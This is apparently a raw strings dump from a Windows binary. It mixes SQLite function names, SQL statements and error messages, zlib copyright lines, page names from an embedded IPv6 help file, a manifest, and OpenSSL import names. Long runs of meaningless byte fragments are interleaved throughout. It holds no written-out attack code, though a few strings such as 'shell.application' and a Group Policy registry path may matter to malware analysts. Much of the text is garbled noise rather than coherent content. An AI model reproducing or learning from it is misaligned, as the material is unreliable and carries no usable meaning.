sqlite3_compileoption_used
sqlite3_compileoption_get
sqlite3_initialize
sqlite3_shutdown
sqlite3_close
sqlite3_errcode
sqlite3_errmsg
sqlite3_extended_result_codes
sqlite3_open
sqlite3_open_v2
sqlite3_key
sqlite3_rekey
sqlite3_trace
sqlite3_profile
sqlite3_busy_timeout
sqlite3_get_autocommit
sqlite3_set_authorizer
sqlite3_update_hook
sqlite3_limit
sqlite3_changes
sqlite3_total_changes
sqlite3_interrupt
sqlite3_last_insert_rowid
sqlite3_enable_shared_cache
sqlite3_release_memory
sqlite3_soft_heap_limit
sqlite3_status
sqlite3_malloc
sqlite3_memory_used
sqlite3_memory_highwater
sqlite3_prepare
sqlite3_finalize
sqlite3_step
sqlite3_reset
sqlite3_column_count
sqlite3_column_type
sqlite3_column_name
sqlite3_column_database_name
sqlite3_column_table_name
sqlite3_column_origin_name
sqlite3_column_decltype
sqlite3_column_blob
sqlite3_column_double
sqlite3_column_int64
sqlite3_column_text
sqlite3_column_bytes
sqlite3_clear_bindings
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_blob
sqlite3_bind_double
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_text
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_value_type
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_double
sqlite3_value_int64
sqlite3_value_text
sqlite3_result_blob
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error_code
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_text
sqlite3_result_zeroblob
sqlite3_create_collation
sqlite3_create_function
sqlite3_user_data
sqlite3_enable_load_extension
sqlite3_load_extension
sqlite3_free
sqlite3_table_column_metadata
sqlite3_progress_handler
sqlite3_declare_vtab
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_backup_init
sqlite3_backup_step
sqlite3_backup_finish
sqlite3_backup_remaining
sqlite3_backup_pagecount
sqlite3_wal_hook
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_rtree_geometry_callback
sqlite3_blob_open
sqlite3_blob_close
sqlite3_blob_bytes
sqlite3_blob_read
sqlite3_blob_write
sqlite3_vtab_config
sqlite3_vtab_on_conflict
SQLITE_INTEGER
SQLITE_FLOAT
SQLITE_TEXT
SQLITE_BLOB
SQLITE_NULL
PRIMARY KEY must be unique
8.unj
sqlite3
sqlite_version
SQLiteNativeException
DriverID=SQLite
shell.application
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{5A2BF78A-8DE6-4B43-8D7B-AD23782B0E74}User
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%<!"%$%&%(%*% %-%/%1%3%5%7%9%;$=%?%A%D%F%H%J%K%L%M%N%O%R%U%X%[%^%_%`%a%b%d%f%h%i%j%k%l%m%o%s% !,!
P%S%V%Y%\%
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
inflate 1.0.4 Copyright 1995-1996 Mark Adler
8$4,8$4
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
3.7.15
SQLITE_
d-d-d d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
SQLite format 3
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
sqlite_stat3
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
Invalid key value
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
rekey
hexkey
hexrekey
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
no such table column: %s.%s
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
docid INTEGER PRIMARY KEY
%z, 'c%d%q'
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
PRAGMA %Q.page_size
,%s(x.'c%d%q')
FROM '%q'.'%q%s' AS x
,%s(?)
unrecognized parameter: %s
unrecognized matchinfo: %s
unrecognized order: %s
error parsing prefix parameter: %s
missing %s parameter in fts4 constructor
SELECT %s WHERE rowid = ?
malformed MATCH expression: [%s]
SELECT %s ORDER BY rowid %s
illegal first argument to %s
porter
unknown tokenizer: %s
SELECT %s WHERE rowid=?
INSERT INTO %Q.'%q_content' VALUES(%s)
%s_segments
SELECT %s
unrecognized matchinfo request: %c
%d %d %d %d
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
CREATE TABLE x(%s
%s, %s
%s {%s}
?456789:;<=
!"#$%&'()* ,-./0123
10000000000000000010
/#URLSTR
/#URLTBL
/#WINDOWS
/$WWKeywordLinks/
/$WWKeywordLinks/BTree
/$WWKeywordLinks/Data
/$WWKeywordLinks/Map
/$WWKeywordLinks/Property
/compile_date.htm
/IPv6.hhc
/IPv6P.hhk
/sag_IP_v6_add_bibliography.htm
/sag_IP_v6_add_standards.htm
/sag_IP_v6_add_topnode.htm
/sag_IP_v6_add_Utils.htm
/sag_ip_v6_conf_ia.htm
/sag_ip_v6_conf_manual.htm
/sag_IP_v6_imp_aa.htm
/sag_ip_v6_imp_addr1.htm
/sag_ip_v6_imp_addr2.htm
/sag_ip_v6_imp_addr3.htm
/sag_ip_v6_imp_addr4.htm
/sag_ip_v6_imp_addr5.htm
/sag_ip_v6_imp_addr6.htm
/sag_ip_v6_imp_addr7.htm
/sag_IP_v6_imp_addr_node.htm
/sag_IP_v6_imp_addr_topnode.htm
/sag_ip_v6_imp_conf1.htm
/sag_ip_v6_imp_conf2.htm
/sag_ip_v6_imp_conf3.htm
/sag_ip_v6_imp_conf4.htm
/sag_ip_v6_imp_conf5.htm
/sag_ip_v6_imp_conf6.htm
/sag_IP_v6_imp_conf_node.htm
/sag_IP_v6_imp_config_items.htm
/sag_IP_v6_imp_config_meth.htm
/sag_ip_v6_imp_lab_inf.htm
/sag_IP_v6_imp_lab_node.htm
/sag_ip_v6_imp_lab_tasks.htm
/sag_IP_v6_imp_routing.htm
f /sag_IP_v6_imp_routing_table.htm
/sag_IP_v6_imp_topnode.htm
/sag_IP_v6_ovr_background.htm
/sag_IP_v6_ovr_features.htm
/sag_IP_v6_ovr_secfeatures.htm
/sag_IP_v6_ovr_topnode.htm
/sag_IP_v6_ovr_whatis.htm
/sag_ip_v6_pro_conf_node.htm
/sag_ip_v6_pro_diag_ifconf.htm
/sag_ip_v6_pro_diag_nc.htm
/sag_ip_v6_pro_diag_ping6.htm
"/sag_ip_v6_pro_diag_ping6_conn.htm
/sag_ip_v6_pro_diag_rc.htm
/sag_ip_v6_pro_diag_tracert.htm
/sag_IP_v6_pro_DiagNode.htm
/sag_ip_v6_pro_inst.htm
/sag_ip_v6_pro_instnode.htm
/sag_ip_v6_pro_remove.htm
/sag_IP_v6_pro_RouteNode.htm
/sag_ip_v6_pro_rt_add.htm
/sag_ip_v6_pro_rt_enable.htm
/sag_ip_v6_pro_rt_remove.htm
/sag_ip_v6_pro_rt_view.htm
/sag_IP_v6_tro_topnode.htm
/sag_IP_v6_und_core_topnode.htm
/sag_IP_v6_und_icmp.htm
/sag_ip_v6_und_ie.htm
/sag_IP_v6_und_ip.htm
/sag_IP_v6_und_MLD.htm
/sag_IP_v6_und_ND.htm
/sag_IP_v6_und_netapps.htm
/sag_IP_v6_und_nr.htm
/sag_IP_v6_und_topnode.htm
/sag_IP_v6_und_winsock.htm
/sag_IP_v6checklist.htm
/sag_IP_v6concepts.htm
/sag_IP_v6procedures.htm
/sag_IP_v6topnode.htm
<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/
i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable
HHA Version 4.74.8702
MS-ITS:IPv6.chm::/sag_IP_v6topnode.htm
%-Ub
a}.SU
mFf.XUs
F:\pV
%D=]WP
-YdWp}H
u|%dU)
@-t}Y!
n.yJkZ_
[.eAk
3.MNS!W
hE.mI
&si%d
RvjY].Hy
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
.rsrc
.FF=6
ÝL\
(%UV3
m`%C%
W.ik"
"%dpd
B.dX\
K.MsiNOSVW4M
_%xCr
(,P$.dd
ag[.FI
>S<%d
u<.hl#
.pc-p11
ySV%sy
4.VX9o
.EKS[
6.JN,
'vOp%DQV
GVa.Za
%b%CT
?4.bX
a,%fMi
FSg.jP
.IX9n[
?VSQ
(mackX@4.mG]
?%Cp`7
Hx
.BOFW
.yI~zRPSN
sŸu
\.LPT\
,X):
_CRTjECUAG
1.0.1g 7Q9
c%FIP
&'()* ,-./
key?iGjivj
.pp@0
>.Dh$
[ u?%
%'%1$=%C%K%O%s%
&'&)&5&;&?
.%.-.3.7.9.?.W.[.o.y.
3Ó/353A3G3[3_3g3k3
C%C'C3C7C9COCWCiC
BUILTIN_KEYp
-Key: 26my
.pkmg`
7JOING8
.VnbC
WG|s.nN
_keyf
~/faq.Dml
DO@.@.CB
.djosu'
SShKm%'
22####2222
lmO`.Tn
tq.FC)
H.Xl?g
y.zF.
%2sBRO
?o.zmT
62%8sRq
@!,9\^00
E>O%s?
d.kek
.dBhP^p
&Az6T}b
[[%s]]
HTTP/
s<.na9
6144819
u [.WiG
l}C.we
R.QA@
.QEht
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.30729.4148" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
CRYPT32.dll
GDI32.dll
MSVCR90.dll
USER32.dll
WS2_32.dll
ReportEventA
CertOpenStore
LIBEAY32.dll
AES_set_decrypt_key
AES_set_encrypt_key
AES_unwrap_key
AES_wrap_key
ASN1_PCTX_get_cert_flags
ASN1_PCTX_set_cert_flags
AUTHORITY_KEYID_free
AUTHORITY_KEYID_it
AUTHORITY_KEYID_new
BF_set_key
BIO_get_port
BIO_set_tcp_ndelay
CAST_set_key
CERTIFICATEPOLICIES_free
CERTIFICATEPOLICIES_it
CERTIFICATEPOLICIES_new
CMS_EncryptedData_set1_key
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_pkey
CMS_SignerInfo_cert_cmp
CMS_SignerInfo_set1_signer_cert
CMS_add0_CertificateChoices
CMS_add0_cert
CMS_add0_recipient_key
CMS_add0_recipient_password
CMS_add1_cert
CMS_add1_recipient_cert
CMS_decrypt_set1_key
CMS_decrypt_set1_password
CMS_decrypt_set1_pkey
CMS_get1_certs
CMS_set1_signers_certs
Camellia_set_key
DES_check_key_parity
DES_is_weak_key
DES_key_sched
DES_random_key
DES_read_2passwords
DES_read_password
DES_set_key_checked
DES_set_key_unchecked
DES_string_to_2keys
DES_string_to_key
DH_check_pub_key
DH_compute_key
DH_generate_key
DSA_generate_key
ECDH_compute_key
EC_KEY_check_key
EC_KEY_clear_flags
EC_KEY_copy
EC_KEY_dup
EC_KEY_free
EC_KEY_generate_key
EC_KEY_get0_group
EC_KEY_get0_private_key
EC_KEY_get0_public_key
EC_KEY_get_conv_form
EC_KEY_get_enc_flags
EC_KEY_get_flags
EC_KEY_get_key_method_data
EC_KEY_insert_key_method_data
EC_KEY_new
EC_KEY_new_by_curve_name
EC_KEY_precompute_mult
EC_KEY_print
EC_KEY_print_fp
EC_KEY_set_asn1_flag
EC_KEY_set_conv_form
EC_KEY_set_enc_flags
EC_KEY_set_flags
EC_KEY_set_group
EC_KEY_set_private_key
EC_KEY_set_public_key
EC_KEY_set_public_key_affine_coordinates
EC_KEY_up_ref
ENGINE_cmd_is_executable
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd_string
ENGINE_get_cmd_defns
ENGINE_get_load_privkey_function
ENGINE_get_load_pubkey_function
ENGINE_get_pkey_asn1_meth
ENGINE_get_pkey_asn1_meth_engine
ENGINE_get_pkey_asn1_meth_str
ENGINE_get_pkey_asn1_meths
ENGINE_get_pkey_meth
ENGINE_get_pkey_meth_engine
ENGINE_get_pkey_meths
ENGINE_get_ssl_client_cert_function
ENGINE_load_private_key
ENGINE_load_public_key
ENGINE_load_ssl_client_cert
ENGINE_pkey_asn1_find_str
ENGINE_register_all_pkey_asn1_meths
ENGINE_register_all_pkey_meths
ENGINE_register_pkey_asn1_meths
ENGINE_register_pkey_meths
ENGINE_set_cmd_defns
ENGINE_set_default_pkey_asn1_meths
ENGINE_set_default_pkey_meths
ENGINE_set_load_privkey_function
ENGINE_set_load_pubkey_function
ENGINE_set_load_ssl_client_cert_function
ENGINE_set_pkey_asn1_meths
ENGINE_set_pkey_meths
ENGINE_unregister_pkey_asn1_meths
ENGINE_unregister_pkey_meths
ESS_CERT_ID_dup
ESS_CERT_ID_free
ESS_CERT_ID_new
ESS_SIGNING_CERT_dup
ESS_SIGNING_CERT_free
ESS_SIGNING_CERT_new
EVP_BytesToKey
EVP_MD_pkey_type
EVP_PKCS82PKEY
EVP_PKEY2PKCS8
EVP_PKEY2PKCS8_broken
EVP_PKEY_add1_attr
EVP_PKEY_add1_attr_by_NID
EVP_PKEY_add1_attr_by_OBJ
EVP_PKEY_add1_attr_by_txt
EVP_PKEY_delete_attr
EVP_PKEY_get_attr
EVP_PKEY_get_attr_by_NID
EVP_PKEY_get_attr_by_OBJ
EVP_PKEY_get_attr_count
EXTENDED_KEY_USAGE_free
EXTENDED_KEY_USAGE_it
EXTENDED_KEY_USAGE_new
JPAKE_get_shared_key
KRB5_ENCKEY_free
KRB5_ENCKEY_it
KRB5_ENCKEY_new
NETSCAPE_CERT_SEQUENCE_free
NETSCAPE_CERT_SEQUENCE_it
NETSCAPE_CERT_SEQUENCE_new
NETSCAPE_SPKI_get_pubkey
NETSCAPE_SPKI_set_pubkey
OCSP_CERTID_dup
OCSP_CERTID_free
OCSP_CERTID_it
OCSP_CERTID_new
OCSP_CERTSTATUS_free
OCSP_CERTSTATUS_it
OCSP_CERTSTATUS_new
OCSP_basic_add1_cert
OCSP_cert_id_new
OCSP_cert_status_str
OCSP_cert_to_id
OCSP_parse_url
OCSP_request_add1_cert
OCSP_url_svcloc_new
PEM_read_DSAPrivateKey
PEM_read_DSA_PUBKEY
PEM_read_ECPrivateKey
PEM_read_EC_PUBKEY
PEM_read_NETSCAPE_CERT_SEQUENCE
PEM_read_PKCS8_PRIV_KEY_INFO
PEM_read_PUBKEY
PEM_read_PrivateKey
PEM_read_RSAPrivateKey
PEM_read_RSAPublicKey
PEM_read_RSA_PUBKEY
PEM_read_X509_CERT_PAIR
PEM_read_bio_DSA_PUBKEY
PEM_read_bio_ECPrivateKey
PEM_read_bio_EC_PUBKEY
PEM_read_bio_PKCS8_PRIV_KEY_INFO
PEM_read_bio_PUBKEY
PEM_read_bio_RSA_PUBKEY
PEM_read_bio_X509_CERT_PAIR
PEM_write_DSAPrivateKey
PEM_write_DSA_PUBKEY
PEM_write_ECPrivateKey
PEM_write_EC_PUBKEY
PEM_write_NETSCAPE_CERT_SEQUENCE
PEM_write_PKCS8PrivateKey
PEM_write_PKCS8PrivateKey_nid
PEM_write_PKCS8_PRIV_KEY_INFO
PEM_write_PUBKEY
PEM_write_PrivateKey
PEM_write_RSAPrivateKey
PEM_write_RSAPublicKey
PEM_write_RSA_PUBKEY
PEM_write_X509_CERT_PAIR
PEM_write_bio_DSA_PUBKEY
PEM_write_bio_ECPrivateKey
PEM_write_bio_EC_PUBKEY
PEM_write_bio_PKCS8PrivateKey_nid
PEM_write_bio_PKCS8_PRIV_KEY_INFO
PEM_write_bio_PUBKEY
PEM_write_bio_RSA_PUBKEY
PEM_write_bio_X509_CERT_PAIR
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_PBE_keyivgen
PKCS12_add_cert
PKCS12_add_key
PKCS12_add_localkeyid
PKCS12_certbag2x509
PKCS12_certbag2x509crl
PKCS12_decrypt_skey
PKCS12_key_gen_asc
PKCS12_key_gen_uni
PKCS12_newpass
PKCS12_x5092certbag
PKCS12_x509crl2certbag
PKCS7_add_certificate
PKCS7_cert_from_signer_info
PKCS8_PRIV_KEY_INFO_free
PKCS8_PRIV_KEY_INFO_it
PKCS8_PRIV_KEY_INFO_new
PKCS8_add_keyusage
PKCS8_pkey_get0
PKCS8_pkey_set0
PKEY_USAGE_PERIOD_free
PKEY_USAGE_PERIOD_it
PKEY_USAGE_PERIOD_new
PROXY_CERT_INFO_EXTENSION_free
PROXY_CERT_INFO_EXTENSION_it
PROXY_CERT_INFO_EXTENSION_new
RC2_set_key
RC4_set_key
RSAPrivateKey_dup
RSAPrivateKey_it
RSAPublicKey_dup
RSAPublicKey_it
SEED_set_key
SRP_Calc_client_key
SRP_Calc_server_key
TS_CONF_load_cert
TS_CONF_load_certs
TS_CONF_load_key
TS_CONF_set_certs
TS_CONF_set_ess_cert_id_chain
TS_CONF_set_signer_cert
TS_CONF_set_signer_key
TS_MSG_IMPRINT_dup
TS_MSG_IMPRINT_free
TS_MSG_IMPRINT_get_algo
TS_MSG_IMPRINT_get_msg
TS_MSG_IMPRINT_new
TS_MSG_IMPRINT_print_bio
TS_MSG_IMPRINT_set_algo
TS_MSG_IMPRINT_set_msg
TS_REQ_get_cert_req
TS_REQ_get_msg_imprint
TS_REQ_set_cert_req
TS_REQ_set_msg_imprint
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_signer_key
TS_TST_INFO_get_msg_imprint
TS_TST_INFO_set_msg_imprint
X509_CERT_AUX_free
X509_CERT_AUX_it
X509_CERT_AUX_new
X509_CERT_AUX_print
X509_CERT_PAIR_free
X509_CERT_PAIR_it
X509_CERT_PAIR_new
X509_CRL_get0_by_cert
X509_PKEY_free
X509_PKEY_new
X509_PUBKEY_free
X509_PUBKEY_get0_param
X509_PUBKEY_it
X509_PUBKEY_new
X509_PUBKEY_set
X509_PUBKEY_set0_param
X509_REQ_check_private_key
X509_REQ_get_pubkey
X509_STORE_CTX_set_cert
X509_STORE_get1_certs
X509_certificate_type
X509_check_private_key
X509_get0_pubkey_bitstr
X509_get_default_cert_area
X509_get_default_cert_dir
X509_get_default_cert_dir_env
X509_get_pubkey
X509_get_pubkey_parameters
X509_keyid_get0
X509_keyid_set1
X509_load_cert_crl_file
X509_load_cert_file
X509_pubkey_digest
X509_supported_extension
X509_verify_cert
X509_verify_cert_error_string
_ossl_old_des_is_weak_key
_ossl_old_des_key_sched
_ossl_old_des_random_key
_ossl_old_des_read_2passwords
_ossl_old_des_read_password
_ossl_old_des_string_to_2keys
_ossl_old_des_string_to_key
_shadow_DES_check_key
aesni_set_decrypt_key
aesni_set_encrypt_key
b2i_PrivateKey
b2i_PrivateKey_bio
b2i_PublicKey
b2i_PublicKey_bio
d2i_AUTHORITY_KEYID
d2i_CERTIFICATEPOLICIES
d2i_DSAPrivateKey_bio
d2i_DSAPrivateKey_fp
d2i_DSAPublicKey
d2i_DSA_PUBKEY
d2i_DSA_PUBKEY_bio
d2i_DSA_PUBKEY_fp
d2i_ECPrivateKey
d2i_ECPrivateKey_bio
d2i_ECPrivateKey_fp
d2i_EC_PUBKEY
d2i_EC_PUBKEY_bio
d2i_EC_PUBKEY_fp
d2i_ESS_CERT_ID
d2i_ESS_SIGNING_CERT
d2i_EXTENDED_KEY_USAGE
d2i_KRB5_ENCKEY
d2i_NETSCAPE_CERT_SEQUENCE
d2i_OCSP_CERTID
d2i_OCSP_CERTSTATUS
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
d2i_PKCS8_PRIV_KEY_INFO
d2i_PKCS8_PRIV_KEY_INFO_bio
d2i_PKCS8_PRIV_KEY_INFO_fp
d2i_PKEY_USAGE_PERIOD
d2i_PROXY_CERT_INFO_EXTENSION
d2i_PUBKEY
d2i_PUBKEY_bio
d2i_PUBKEY_fp
d2i_PrivateKey_fp
d2i_RSAPrivateKey_bio
d2i_RSAPrivateKey_fp
d2i_RSAPublicKey_bio
d2i_RSAPublicKey_fp
d2i_RSA_PUBKEY
d2i_RSA_PUBKEY_bio
d2i_RSA_PUBKEY_fp
d2i_TS_MSG_IMPRINT
